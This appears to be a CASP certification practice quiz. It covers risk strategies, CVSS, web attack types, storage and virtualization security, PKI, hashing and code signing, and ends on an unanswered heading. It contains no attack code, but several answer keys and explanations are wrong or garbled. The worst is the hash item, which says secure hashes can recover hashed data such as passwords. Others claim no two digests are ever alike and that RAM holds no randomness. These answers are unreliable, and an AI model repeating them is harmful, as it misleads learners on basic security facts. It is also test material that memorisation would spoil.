Risk Reduction Strategies
What are the four strategies for reducing or removing risk from an organization? (Select four)
- Isolate
- Mitigate
- Assess
- Accept
- Educate
- Transfer
- Avoid
Show answer and Breakdown
Answer: The correct answer is 2, 4, 6, and 7.
Breakdown: How an organization reduces or removes risk is based on the threshold established for different risks and is dependent on the risk tolerance of the organization. For any organization, there are four strategies for reducing or removing risk: Mitigate – reduce risk to an acceptable level. Transfer – put risk in hands of someone else, i.e. delegate the risk to a qualified professional. Accept – concede that stuff will eventually happen and accept the eventual cost. Avoid – cease the risky behavior.
CVSS Metric Groups
What are the three core CVSS metric groups?
- Information attribute group, vulnerability threat value, CIA attribute
- Base metric group, Vulnerability metric group, Environmental metric group
- Base metric group, Temporal metric group, Environmental metric group
- Base metric group, Integrity metric group, Threat metric group
Show answer and Breakdown
Answer: The correct answer is 3.
Breakdown: The Common Vulnerability Scoring System (CVSS) is a risk management approach to quantifying data and then taking into account the degree of risk to different types of systems or information. The three core metric groups of the system are: Base metric group Temporal metric group Environmental metric group
CIA Triad Definition
What are the three components of the CIA Triad? (Select three)
- Information
- Integrity
- Classification
- Confidentiality
- Assurance
- Clearance
- Availability
Show answer and Breakdown
Answer: The correct answer is 4, 2, and 7.
Breakdown: All organizational risks can be described by their threat to the confidentiality, integrity, or availability of an asset. Assets can be defined as hardware, data, or people.
Cost Benefit Analysis Basics
When performing a cost benefit analysis, what acronym is used to discuss all costs involved with a solution?
- MTTR
- TCO
- CVSS
- EOL
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: Total Cost of Ownership (TCO) is the metric that includes all costs involved with implementing and supporting a solution.
ROI Definition
What is ROI?
- Rate of Income
- Return on Investment
- Rate of Interoperability
- Random or Intentional
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: When performing a cost benefit analysis, it’s important to calculate your return on investment (ROI). ROI measures the benefit gained in relation to the amount of money being spent on a solution. This metric is important when presenting a new solution to the business.
Vulnerability Scanner Accuracy
True or false? A vulnerability scanner always finds all vulnerabilities on the network.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: A vulnerability scanner can find many unsuspected vulnerabilities on a network, however, it can’t be relied on to find all of them. There are many factors that can contribute to vulnerabilities going undetected.
Cracking HTTPS Traffic
True or false? A packet capture of HTTPS traffic can be read clearly in tools such as Wireshark.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: Wireshark is a full-featured network protocol analyzer that can capture and analyze communication sessions. Though it can reassemble SSL conversations, it requires the SSL private key to decrypt the stream.
Vulnerability Assessment Definition
Which of the following is the best description of a vulnerability assessment?
- Determining the threats to a network.
- Determining the impact each threat poses to a network.
- Determining the likelihood a given threat will be exploited.
- Determining the weaknesses in a network that could be exploited.
Show answer and Breakdown
Answer: The correct answer is 4.
Breakdown: A vulnerability assessment is an evaluation used to find security weaknesses within an organization’s technology. Assessments are usually carried out using automated vulnerability scanning tools.
Black Box Penetration Testing
What is the goal of black box penetration testing?
- To simulate a real external hacker or attacker.
- To simulate a user within the organization that has been bribed or coerced to disclose proprietary information.
- To simulate a malicious worm or virus.
- To simulate an attacker that has some knowledge of the organization and its infrastructure.
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: Black box penetration testing simulates an outside attacker who knows little about the systems or network being attacked. This is also called a zero knowledge test and requires that the penetration tester gather all types of information about the target prior to starting the testing phase or the penetration test.
Automate Vulnerability Testing
Which of the following is an automated software testing auditing technique that provides invalid and unexpected inputs to the application to identify possible vulnerabilities?
- Black box testing
- White box testing
- Fuzzing
- Gray box testing
Show answer and Breakdown
Answer: The correct answer is 3.
Breakdown: Fuzzing is a black box testing technique that generates a wide range of unexpected input values to a system. Typically, an automated application is used for fuzz testing. Fuzzing can be invaluable in ensuring that the most likely exploitable vulnerabilities have been detected or identified.
Circumventing JavaScript Validation Exploits
Joey disables JavaScript in his web browser to circumvent the JavaScript validation checks being performed, allowing him to submit malformed data inputs into a web application. What type of controls is Joey circumventing by disabling JavaScript?
- Server-side controls
- Client-side controls
- Web application firewall controls
- SQL injection controls
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: Client-side data validation is performed by using a client-side scripting language such as JavaScript when the end user is filling in form data or before it is submitted to the web server. However, disabling client-side code is trivial and can be done by simply configuring the browser to disable JavaScript. The key point to remember is that client-side data cannot be controlled and therefore cannot be trusted.
Web Application Compromise
John supplies an apostrophe or single quotation mark in the password field to log into a web application he normally doesn’t have access to. What is this type of attack called?
- SQL Injection
- Cross-Site Request Forgery
- AJAX
- Session Prediction
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: A SQL injection exploit targets vulnerabilities in Web applications in order to gain unauthorized access to the backend database and its contents. The simplest and most common method for identifying possible SQL injection vulnerabilities is to submit a single apostrophe in an HTTP request and then look for errors. If an error is returned, the attacker will look to see if it provides him with SQL syntax details that can then be used to construct a more effective SQL injection query.
Privilege Escalation Exploits
Which of the following are examples of privilege escalation? (Choose all that apply)
- Mary uses a password cracking application to crack the admin password and login to the domain controller.
- Sam logs into his account and then exploits a local application to execute commands as root on a Linux server.
- Jimmy logs into his account and then takes over Christy’s account.
- Fred exploits a webmail application by tricking users to visit his web site that makes requests to the targeted user’s email preferences to modify the user’s email setting and forward all emails to Fred’s email account.
Show answer and Breakdown
Answer: The correct answer is 1 and 2.
Breakdown: Privilege escalation exploits occur when a user is able to obtain access to additional resources or functionality which they are normally not allowed access to. One of the most common scenarios is when a normal user is able to exploit some vulnerability on a system to gain administrator or root level privileges as in choices a and b in the question above.
Buffer Overflow Exploit Prevention
Which of the following security measures would be the most effective against a buffer overflow exploit attack?
- Validating user inputs to remove special characters.
- Implementing strong encryption.
- Secure coding standards.
- Application layer firewall.
Show answer and Breakdown
Answer: The correct answer is 3.
Breakdown: The single most effective method for dealing with buffer overflow exploits is to implement secure coding standards. Developers can become both complacent and lazy and feel that they have met the requirements when the code they produce functions. Having rules and standards in place along with proper audits – both automated and in the form of code reviews – is a step in the right direction in writing more secure applications.
Cross-Site Scripting Attack Types
A malicious attacker submits a Cross-site scripting (XSS) exploit code to an online web forum that is vulnerable to this attack. When unsuspecting users visit the malicious attacker’s forum posting their session tokens are stolen and posted to the attacker’s server. Which of the following types of XSS attacks is the attacker performing?
- Cross-site Request Forgery (CSRF)
- Persistent Cross-site Scripting (XSS)
- Session Fixation
- Non-persistent Cross-site Scripting (XSS)
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: There are three major types of XSS vulnerabilities: Persistent, Non-Persistent, and DOM. The persistent variety occurs when data is provided by an end user to a web application and then stored persistently on the server as data in a database or other location. This data is then later displayed to users in a web page without being sanitized or validated as in online message boards where users are allowed to post HTML-formatted messages for others to read.
Browser Exploits
Name the malicious attack technique used in the following scenario: A user visits a web site that offers a reaction speed test where the user clicks on a pop up button several times to measure the user’s reaction speed. Unknowingly to the user, an eCommerce product web page is loaded hidden underneath the game and is capturing these mouse clicks to express that the user “likes” different products on the site.
- Click-jacking
- Cross-site scripting
- Buffer overflow
- Cross-site request forgery
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: The scenario above is an example of click-jacking which is a cross-domain attack designed to hijack user-initiated mouse clicks in order to perform actions that the user did not intend and is not aware of.
Resource Exhaustion Exploits
Which of the following are examples of resource exhaustion exploits? (Choose all that apply)
- SYN Flooding a network.
- Allocating 100% of the system RAM to a single application.
- Smurf Attack.
- Submitting an integer value that is too large to be stored in the allocated variable type.
Show answer and Breakdown
Answer: The correct answer is 1, 2, and 3.
Breakdown: All of the above examples with the exception of d, are examples of resource exhaustion exploits. Example d will cause an integer overflow condition which could potentially be used to gain control of an application as in other buffer overflow attacks. It may also cause invalid data to be entered into an application which in turn could produce unexpected results.
SPML Automation
SPML is used to automate which process?
- Authentication
- Provisioning
- Certificate revocation handling
- Access control
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: Service Provisioning Markup Language (SPML) is an XML-based framework for automating and managing the provisioning of resources across networks and organizations. SPML allows for all of the assets assigned to an employee, department, sub-contractor, etc., to be tracked and managed.
SAML Assertions for Resource Access
True or false? SAML assertions by themselves allow for access to resources.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: Security Assertion Markup Language (SAML) is an XML-based standard for securely exchanging authentication-related data. One of the components of SAML is assertions, which are sets of authorization, attribute, and authentication data. Authentication provides information necessary to make a decision on allowing or disallowing access to a resource.
XACML Policies
XACML policies contain which of the following entities?
- PolicySet
- Policies
- Rules
- Resources
Show answer and Breakdown
Answer: The correct answer is 3.
Breakdown: XACML is a three-level hierarchy used to place and grant permissions based on access controls. The first level is the PolicySet which is a group of policies. The policies are sets of rules that are used in conjunction with one another to define the permissions for a single action.
Certificate Based Authentication
True or false? Certificate based authentication allows for a user and his resources to be tracked throughout the organization to a single identity.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: Certificate based authentication generates digital certificates for each user and service within a network and then uses these certificates to authenticate actions, privileges, and requests. This authentication method provides a number of strong security properties. Every client can be assured of the server they are communicating with, and every server can be assured that they are dealing with a legitimate client.
Single Sign On Authentication
True or false? Single Sign On (SSO) allows multiple people to share an account after one of them authenticates with a service.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: SSO is an access control process that allows for a single user to authenticate once and receive access to many resources. It has the advantage to allow users to roam and have transparent access to multiple services. An example of SSO is Google GMail, which allows access to the rest of Google's services with a single login.
Enterprise Service Bus Basics
True or false? An Enterprise Service Bus (ESB) is a methodology for designing and developing software applications in the form of interoperable services.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: An ESB is a software architecture model used for designing and implementing a communication framework between various applications usually found in a Service Oriented Architecture (SOA). The bus concept is very similar to that of a hardware system where messages are passed over the bus to various endpoints. It is designed to operate independently of the various endpoints within the architecture and endpoints can either be producers or consumers of the messages that are routed through the bus.
Layer 2 Switch Security
Which of the following is a security mechanism in connected network switches that enables switch ports on any switch that is connected to a switch trunk to deny access through the port based on the MAC address?
- Star
- Mesh
- Trunking security
- QoS
Show answer and Breakdown
Answer: The correct answer is 3.
Breakdown: Trunking security is a security mechanism in connected network switches that enable switch ports on any switch that is connected to the trunk to deny access through the port based on the MAC address of an offending device connected to the switch. In effect, a device can be completely blocked at the switch based on its MAC address. This prevents the device from propagating malicious traffic across the trunk and subsequently to other parts of the network.
Active Directory Service
Active Directory is Microsoft’s implementation of what directory service?
- LDAP
- DNSSEC
- PAN
- SSO
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: Active Directory is Microsoft’s Lightweight Directory Access Protocol (LDAP)-compatible directory implementation.
Quality of Service Techniques
Which of the following is the practice of prioritizing the flow of packets over the network in order to meet quality of service (QoS) requirements, speed up or delay particular packets, increase available bandwidth, or otherwise ensure network or protocol performance?
- Virtual Private Networking
- Traffic shaping
- Trunking
- Traffic encoding
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: As new applications are introduced into an enterprise, priorities for performance and accessibility may change. There are two common methods to control data flow security: traffic shaping and virtual circuits. Traffic shaping is the practice of prioritizing the flow of packets over the network in order to meet quality of service (QoS) requirements, speed up or delay particular packets, increase available bandwidth, or otherwise ensure network or protocol performance.
Virtual Storage Security Concerns
What are some of the security concerns that must be addressed when utilizing virtual storage? (Choose all that apply)
- The storage provider may not be compliant with the industry standards of the organization.
- Data is stored in a physically separate location and is not under the physical control of the organization.
- An attacker could perform a denial of service attack that would halt access to your local network traffic.
- Data from your organization is stored with the data from other organizations, which could make forensic investigation and auditing difficult if not impossible.
Show answer and Breakdown
Answer: The correct answer is 1, 2, and 4.
Breakdown: Though virtual storage offers many advantages, not the least of which is lowered cost, there are several important security issues that need to be considered when using this kind of infrastructure. Compliance with industry standards associated with an organization is an issue that must be addressed. It’s advisable to only work with providers that are willing to be subjected to audits and security certification processes. In addition, data forensics and investigations are vastly more complicated and essentially impossible for a client to conduct on its own. It’s vital that the provider have a mechanism in place that supports these types of investigations. Perhaps the biggest area of concern with virtual storage, and the one that creates all these other issues, is the lack of physical control of an organization’s data. Again, working with a provider that supports maintenance and administrative services is key to making virtual storage a viable and effective solution for an enterprise.
iSCSI Security Implications
Which of the following are security implications of using iSCSI? (Choose all that apply)
- Data on an iSCSI network is not encrypted so other encryption methods like IPSec must be implemented.
- Storage area networks are generally small and therefore easily stolen so they should be kept in a secure location to prevent theft.
- Because iSCSI uses the same protocol as the rest of the network, it relies on network segmentation to prevent users from directly accessing the storage network.
- Storage data and regular network traffic pass over the exact same channel so an attacker could perform a denial of service attack to impact bandwidth.
Show answer and Breakdown
Answer: The correct answer is 1 and 3.
Breakdown: iSCSI is a compromise between traditional SCSI technology and advanced Fibre Channel technology. There are several security implementations that must be considered when deploying iSCSI. Encryption should be implemented at higher layers of the OSI protocol stack since iSCSI operates as a clear text protocol allowing eavesdropping on transmitted data. An iSCSI SAN is not well-isolated from the rest of the network and a misconfigured network setup could make the SAN easily accessible to the regular network.
SAN Advantages
Which of the following are advantages of a Storage Area Network (SAN)? (Choose all that apply)
- Uses a single device to manage all data storage.
- Data can be stored over various types of media including tape drives and writable disk drives.
- Devices can easily be added to the storage network allowing for vast scalability.
- Segmented network that is difficult for a hacker to directly access.
Show answer and Breakdown
Answer: The correct answer is 2, 3, and 4.
Breakdown: One of the primary advantages of a SAN is scalability. You can attach a nearly unlimited number of hard drives or other storage media to increase its size. Since a SAN is its own private network, it is not directly accessible by an attacker thus making a direct attack on the SAN difficult.
Block-Level Storage Basics
Which of the following best describes block-level storage?
- Data is divided up and stored into blocks without any consideration for the actual file or file system itself.
- Files are stored and cataloged for quick retrieval.
- Files are stored on one single device and are not allowed to spread over multiple devices.
- All storage devices must be the same media type.
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: A Storage Area Network (SAN) uses block level data storage, which operates on the same principle as a typical hard drive. A SAN receives blocks of data from all of the systems that are using it and places them where it is most efficient. A single file from one server could have parts stored on a hard drive array, optical drive and tape drive all at the same time. Also like a hard drive, a SAN must be partitioned and formatted in order to be used.
Network Attached Storage Advantages
Which of the following are advantages of a Network Attached Storage (NAS) solution? (Choose all that apply)
- Speed
- Cost-effectiveness
- A single, dedicated purpose
- Ease of configuration
Show answer and Breakdown
Answer: The correct answer is 1, 2, 3, and 4.
Breakdown: NAS is designed with the single purpose of providing file storage, and as such, is relatively easy to configure and maintain, and is high-speed. NAS provides a comparatively low-cost solution for mass storage, which is ideal for smaller organizations with limited resources.
Virtual Desktop Infrastructure Advantages
True or false? Virtual Desktop Infrastructure (VDI) provides reduced downtime in the event of hardware failure.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: In VDI, a desktop operating system and applications are run inside VMs that are hosted on servers within the virtualization infrastructure. This model has several advantages with the primary ones being simplified desktop provisioning and administration and increased security due to centralization. Reduced downtime in the event of hardware failures is another advantage that is a result of centralization. Conversely, there is a greater risk of downtime and lost productivity in the event of network interruptions.
Rogue Hypervisor Attack
In which of the following types of attack does an attacker run a rogue hypervisor to gain complete control over the underlying host operating system?
- VM spoofing
- Privilege escalation
- Hyperjacking
- VM escape
Show answer and Breakdown
Answer: The correct answer is 3.
Breakdown: In hyperjacking, an attacker runs a rogue hypervisor to gain complete control over the underlying operating system and thereby likely control over any guest operating systems running within the environment.
Virtualization Components
Which virtualization component is used to divide one physical server into multiple isolated virtual servers?
- Bare metal
- Hypervisor
- Virtual NIC
- Application virtualization
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: A hypervisor is an additional layer of software that allows for the separation of computing software from the hardware it runs on in a virtualized environment. The hypervisor increases the efficiency of hardware utilization by running multiple guest systems on a single host system with each operating as an independent system which are sometimes called virtual private servers.
Public Key Cryptography
An attacker has compromised the private key of Alice. Assuming the attacker then monitors the network traffic between Alice’s and Bob’s next conversation, what type(s) of data can he uncover? (Choose all that apply)
- Cleartext contents of messages Bob sends.
- Cleartext contents of messages Alice sends.
- Bob’s private key.
Show answer and Breakdown
Answer: The correct answer is 1.
Breakdown: To send Alice an encrypted message, Bob encrypts it with Alice’s public key. Upon delivery, Alice uses her private key to decrypt the message. Thus, if an attacker has Alice’s private key – like Alice – he can see clear text versions of Bob’s messages to Alice.
Preventing Replay Attacks
Which of the following is used to prevent replay attacks?
- Digital signatures
- Digital certificates
- Hasing
- Nonces
Show answer and Breakdown
Answer: The correct answer is 4.
Breakdown: Replay attacks consist of an active attacker who monitors network traffic and later resends packets that were previously transmitted. This is known as a “replay” attack. If the recent packets comprise transactional data, such as a credit card payment or bank account withdrawal, the consequences can be severe. To protect against replay attacks, many protocols include nonces, which are generally pseudo-randomly generated numbers that are part of the encrypted content. The server keeps track of all nonces and checks if the current value matches any of the previously recorded ones. Since the nonce should never repeat, this is a very effective defense against replay attacks.
MD5 Hash Security
True or false? MD5 is a secure hash function.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: The MD5 hash function was published in 1992, but a number of attacks against it have made it an unsecure function. It is now considered broken and should not be used in new systems. Existing implementations should transition away from it.
Secure Hash Function
A hash generated from a secure hash function can be used for which of the following purposes? (Choose all that apply)
- To recover the contents of the hashed data.
- To prove that data was not tampered with since creation of the hash.
- To provide a timeline of alterations to the data.
- To prove who generated the hash.
Show answer and Breakdown
Answer: The correct answer is 1 and 2.
Breakdown: Hashes can be considered “digital fingerprints” of a unique sequence of dat1. A good hash function should ever produce the same output (hash) for any two inputs. Hashes can be used for several purposes: Recover hashed data such as user passwords. Digital forensics to prove that hashed data collections weren’t otherwise altered or tampered with subsequent to the hashing process. To maintain a database of malware and virus signatures that is easy to compare against.
Certificate Authority Roles
A certificate authority (CA) can be used for which of the following purposes? (Choose all that apply)
- To validate good-standing certificates
- To validate revoked certificates
- To answer queries from a registration authority (RA)
- To prevent man-in-the-middle communications using keys registered with it
Show answer and Breakdown
Answer: The correct answer is 1, 2, and 4.
Breakdown: Digital certificates are an important part of PKI and are used to tie a public key to the identity of the certificate owner. The certificate authority (CA) is responsible for the generation and publication of these certificates. The CA is used to verify the authenticity of an entity’s public key as well as tie the key to its identity. The CA also maintains a list of revoked certificates (CRL), which clients can then request to verify a revoked certificate.
Encryption Key Algorithm Security
True or false? A good encryption key algorithm can remain secure even in the face of a badly generated random number.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: An encryption algorithm is only as strong as the strength of it’s random number generator. Many encryption algorithms have proven insecure due to weaknesses with their encryption keys.
Random Numbers and Entropy
True or false? Entropy is easy to gather as truly random data exists throughout RAM.
- True
- False
Show answer and Breakdown
Answer: The correct answer is 2.
Breakdown: True randomness is rare in the universe and virtually non-existent in a computer. Entropy is a method that attempts to compensate for this by seeding a random number generator with unpredictable phenomena such as noise. The contents of computer RAM are completely devoid of randomness as much of the data it contains is regular and predictable.
Distinguishing Appropriate Cryptographic Tools and Techniques
Most of the companies have security-based products, or look for security related opportunities, which will have a piece of cryptography at their core. This is something that should be able to be handled by using basic cryptographic tools and techniques. Oftentimes expensive hardware and software is required as the designs produced are not secure. It is recommended to get the process right the first time to avoid extra expense. This can be accomplished if there is a…
Show answer and Breakdown
Answer:
comprehensive understanding of the basic tools and techniques and how to exploit them. By knowing the scope of choices and understanding their intended uses and outcomes, you’ll be better at making decisions for your organization.
Cryptographic Applications and Proper Implementation
The critical points of what you need to know about cryptographic applications and proper implementation are as follows:
Show answer and Breakdown
Answer:
Application developers rely on security protocols to structure security services using cryptography. These protocols depend on cryptographic infrastructures, such as Kerberos or Public Key Infrastructure (PKI), to control and assign cryptographic keys. The Cryptographic Technology Group establishes and strengthens standards, test approaches, and guidelines for these essential elements in collaboration with international standards organizations, product developers, and Federal agencies. The Cryptographic Technology Group is also an integral part in the U.S. Federal Government’s PKI deployment activities.
Executing Advanced PKI Concepts
Public Key Infrastructure (PKI) is a set of hardware, software, personnel, policies, and methods required to create, manage, administer, implement, store, and revoke digital certificates. In cryptography, a PKI is a configuration that binds public keys with each user identity through the use of a certificate authority (CA). The user identity must be uniquely applied within each CA domain. The binding is formed in the registration and application process, and depending on the level of security the binding has, it may be executed by software at a CA, or under designated supervision. How is PKI binding authorized?
Show answer and Breakdown
Answer:
PKI authorizes this binding as the Registration Authority (RA). For each user, the user identity, public key, their binding, validity conditions and other aspects are made without vulnerability to unlawful replication in public key certificates issued by the CA. Trusted third party (TTP) can also be applied for certificate authority (CA). The term PKI is sometimes mistakenly used as token public key algorithms, which don’t rely on the use of a CA.
Function of Certificate Authorities
What are the main functions of Certificate Authorities (CA)? How does the Registration Authority (RA) relate to Certificate Authorities?
Show answer and Breakdown
Answer:
The main function of the CA is to publish the key bound to a given user. This is achieved by utilizing the CA’s key so security in the user key is dependent on the authenticity of the CA’s key. Registration Authority (RA) is the mechanism that binds keys to users. The keys may or may not be separated from the CA. Depending on the security level of the binding, key-user binding is put in place by software or under human supervision.
Web of Trust Scheme
Explain what Web of Trust Scheme is and the role it plays in PKI:
Show answer and Breakdown
Answer:
Another tactic in verifying public authentication of public key information is the web of trust scheme, which utilizes self-signed certificates and third party affirmations of those certificates. The term Web of Trust does not infer a single web of trust or common point of trust, but several, possibly disconnected “webs of trust”. PGP and GnuPG are examples of this. Because PGP and GnuPG make use of e-mail digital signatures for self-publication of public key information, it’s not difficult to implement one’s own Web of Trust. One advantage with Web of Trust is its compatibility with a PKI CA verified by all parties in a domain that can guarantee certificates, as a trusted introducer.
Temporary Certificates & Single Sign-On
Temporary Certificates and Single Sign-On:
What are temporary certificates? How do they relate to the single sign-on process?
Show answer and Breakdown
Answer:
Here a server functions as an online certificate authority in a single sign-on system. A single sign-on server issues digital certificates into the client system, but won’t keep record of these certificates. Users can run programs with a temporary certificate, commonly with x.509-based certificates.
What is the Simple Public Key Infrastructure (SPKI)?
The simple public key infrastructure (SPKI) evolved from three independent attempts to resolve the complexities of X.509 and PGP’s web of trust. SPKI doesn’t involve public authentication of public key information, nor does it bind people to keys since the keys rather than users are trusted. SPKI does not use any notion of trust, as the verifier is also the issuer. This is called an “authorization loop” where authorization is essential to its design. The primary entities and functions of SPKI are as follows:
Show answer and Breakdown
Answer:
CA RA Certificate repository Certificate revocation system Key backup and recovery system Automatic key update Management of key histories Cross-certification with other CAs Time stamping Client-side software PKI supplies the following security services: Confidentiality Access control Integrity Authentication Nonrepudiation
Online Certificate Status Protocol (OCSP) vs Certificate Revocation Lists (CRL)
How does OSCP compare and differ from CRL?
Show answer and Breakdown
Answer:
Online Certificate Status Protocol (OCSP) is used for accessing the revocation status of an X.509 digital certificate. It is used to confirm the status of a certificate. It was developed as an alternative to certificate revocation lists (CRL). It offers more relevant information about a certificate’s revocation status. It removes the requirement for clients to retrieve the CRLs themselves, resulting in less network traffic with increased bandwidth management. It is specified in RFC 2560 and is on the Internet standards track.
Wildcard SSL Certificates
What are Wildcard SSL Certificates?
Show answer and Breakdown
Answer:
Wildcard SSL Certificates allows users to secure a limitless number of subdomains on a domain name. Though this can be an advantage there are also risks. Wildcard certificates are becoming cheaper and much more popular. Some providers offer an open-ended server license so only one wildcard certificate is needed and you can utilize as many Web servers as required. Applying 30 different individual SSL certificates can be a complicated task, even with a managed PKI interface. Plus the process has to start all over again, when it’s time for them to be renewed. A wildcard certificate is efficient in many situations.
Issuance to End Entities in PKI
Before detailing message formats and procedures you first need to define the participants involved in PKI management and their interactions. Next, these functions are grouped in order to support the various identifiable types of end entities. The entities involved in PKI management: the end entity i.e., the entity to be named in the subject field of a certificate and the certification authority i.e., the entity named in the issuer field of a certificate. A registration authority may also be involved in PKI management. What are the two main end entities in PKI management?
Show answer and Breakdown
Answer:
Users – Subjects and End Entities: “Subject” pertains to the entity named in the subject field of a certificate; when you want to specify the tools and/or software used by the subject, the term “subject equipment” is applied. The term “end entity” (EE) rather than subject is preferred in order to avoid confusion with the field name. Systems: A Registration/Certification request message has the PKIBody a CertReqMessages data structure that describes the requested certificates. The message is used for active PKI entities who want to access additional certificates. The PKIBody may also be a Certification Request. This structure may be needed for certificate requests for signing key pairs when interoperation with legacy systems is requested, but it's employment is not recommended but only used when absolutely necessary.
Wildcard Certificate Drawbacks
What are the main drawbacks, downsides or weaknesses of Wildcard Certificates?
Show answer and Breakdown
Answer:
Security: If you apply one certificate and private key on several web sites and private servers, it only takes one server to be corrupted for all of the others to be rendered vulnerable. Mobile Device Compatibility: Some mobile device operating systems, including Windows Mobile 5, don’t understand the wildcard character (*) and unable to use a wildcard certificate.
Common Use of PKI and its Three Main Categories
The most common use of PKI is server identification certificates. SSL necessitates a PKI certificate on the server to verify its identity in a trusted manner to the client. Every HTTPS web server connection utilizes SSL and as such uses PKI. This outreach Web concentrates on client-side applications of PKI using end user PKI certificates instead of server certificates. Client-side applications of PKI consist of three categories. What are these categories?
Show answer and Breakdown
Answer:
Authentication Digital signatures Encryption
The Most Popular PKI Applications
What are the most popular PKI applications in academia?
Show answer and Breakdown
Answer:
Authentication Web applications Portals Student information systems Library online journals Network appliances VPN concentrators Firewalls Wireless access points Digital signatures S/MIME secure email (sign individual emails) Electronic document processing Signing XML forms Signing electronic documents Paperless authorization processes Instant messaging (sign each message) Encryption S/MIME secure email (encrypt individual emails) Instant messaging (encrypt each message)
Implications of Cryptographic Methods and Design on Privacy
The importance of privacy and confidentiality of personal information are essential values. Unfortunately privacy is becoming more vulnerable in the constructs of open and private networks as their design didn’t place confidentiality at the top of the list. Cryptography addresses these issues offering privacy enhancing technologies. How does Cryptography play a role in personal privacy?
Show answer and Breakdown
Answer:
Efficient cryptography in a network environment helps safeguard the privacy of personal information and the integrity of confidential information. Removing the use of cryptography in unsecured networks not only compromises the data, it jeopardizes critical elements such as public safety and national security. In some cases, where national law calls for preserving confidentiality, or protecting critical infrastructures, governments may require the use of cryptography of adequate strength. Additionally, the use of cryptography to preserve data integrity in electronic transactions can also have an impact on privacy. Performing transactions through networks creates a data surge where large amounts of information can be easily and cheaply stored, analyzed, and recycled. When transactions require proof of identity, the transactional data will leave very specific and indisputable trails of an individual’s commercial activity, and present a picture of private, non-commercial activities such as political associations, participation in online forums, and access to various types of information in online libraries or other databases. The key certification process also impacts privacy in that the data can be gathered when a certification authority binds an individual to a key pair.
How Privacy Should be Performed to Allow Lawful, Authorized Access
If authorized, lawful access is to be protected, how that should be achieved is unclear. Governments trying different tactics and continue to look for creative solutions from industry. What are the primary methods?
Show answer and Breakdown
Answer:
One approach that would appeal to both users and authorities of the legal system would entail using a key management system where a copy of the private cryptographic key used for confidentiality would be “stored” with a “trusted third party” (TTP). Other methods would allow authorized third-party access to the plaintext of encrypted data. Some could also be used to recover data when keys are lost. It’s critical to understand the distinction between keys used for the purposes of confidentiality and keys used for other purposes. Keys that are used for authentication, data integrity verification, and non-repudiation purposes would not be tied to the same kinds of lawful access by third parties.
Description and Implications of Transport Encryption
It is necessary to understand Transport Encryption for the CompTIA CASP certification exam. Transport encryption (data-in-transit) protects the file as it’s transmitted over protocols such as FTPS (SSL), SFTP (SSH), and HTTPS. Leading solutions use encryption strengths up to 256-bit. File encryption (―data-at-rest‖) encrypts an individual file in the event makes its way to an unauthorized party, they could not access or see the contents. PGP is commonly used to encrypt files. Using both together offers a double-layer of protection, safeguarding files as they’re transferred and the PGP protects the file itself, a critical juncture after it has been moved and on a server, laptop, USB drive, or smartphone. Make certain your organization is no longer using the FTP protocol for sending any type of confidential, private, or sensitive information. What else is important?
Show answer and Breakdown
Answer:
Given the significant accomplishment of FTP functioning after 40 years, it does not offer encryption or guaranteed delivery. Also, a deployed FTP server scattered throughout your organization lacks visibility, management, and enforcement capabilities that modern Managed File Transfer solutions deploy. Some transports do not have adaptability in the degree of protection they provide. SSL security always provides encryption and signing. There is no way to throttle that security method back and so the transport protection level knob is ignored. Windows security does permit throttling the protection level. If the service terminology cites signing only, you are using TCP with Windows security, and the transport protection level is set to signing only as well, therefore everything aligns for you to get signing only.
Transport encryption Vs File Encryption
What is the difference between Transport Encryption and File Encryption?
Show answer and Breakdown
Answer:
Transport encryption safeguards the file as it moves over protocols such as FTPS (SSL), SFTP (SSH), and HTTPS. Leading solutions use encryption strengths up to 256-bit. Pretty Good Privacy (PGP) is used to encrypt files. PGP is a data encryption and decryption program that provides cryptographic privacy and authentication for data communication.
What are Digital Signatures?
What are Digital Signatures?
Show answer and Breakdown
Answer:
Digital Signature Digital signatures are a form of public key cryptography. It’s an electronic signature, a form of ID of a person signing a document. It also contains data about a signatory and can be used to verify the identity of the sender of a message.
The Algorithms of Digital Signature Guidelines
Digital signature guidelines contain three algorithms, what are they?
Show answer and Breakdown
Answer:
Key Generation algorithm: It generates a random key pair. Signing algorithm: It generates a digital signature. Signature verifying algorithm: It verifies the digital signature.
Hashing Explained
What is Hashing and the role it plays in encryption?
Show answer and Breakdown
Answer:
Hashing is a method of selecting a unique fixed-length mathematical derivation (hashes) of a plaintext message. Hashes are also known as digests and the process of hashing is a one-way operation. Ascertaining plaintext content from a hash is technically labeled “computationally infeasible”. In other words, it would take an exorbitant amount of time to achieve. Digests produced by an algorithm are all the same length, no matter the length of the plaintext. For example, the MD5 hashing algorithm creates 128-bit digests whether you calculate the hash of a one-character file or a 10 MB JPEG image. No two digest are alike. Changing any part of the plaintext creates a significant change in the digest (often several bits’ worth of change).
What is Code Signing and What is its Role in Security?
What is Code Signing and how does it play a role in security?
Show answer and Breakdown
Answer:
Code signing is the method of digitally signing applicable scripts to verify the software author and affirm the code has not been modified or corrupted since it was signed by use of a cryptographic hash. There are several advantages to code signing. The primary value of code signing is it provides a layer of security when used. Nearly all code signing techniques will support digital signature mechanisms to confirm the identity of the author or build system, and a checksum to validate the authentication of an object and that it hasn’t been modified. It can also be used to provide versioning information about an object or to store other metadata about an object.
How Does Code Signing Provide Security?
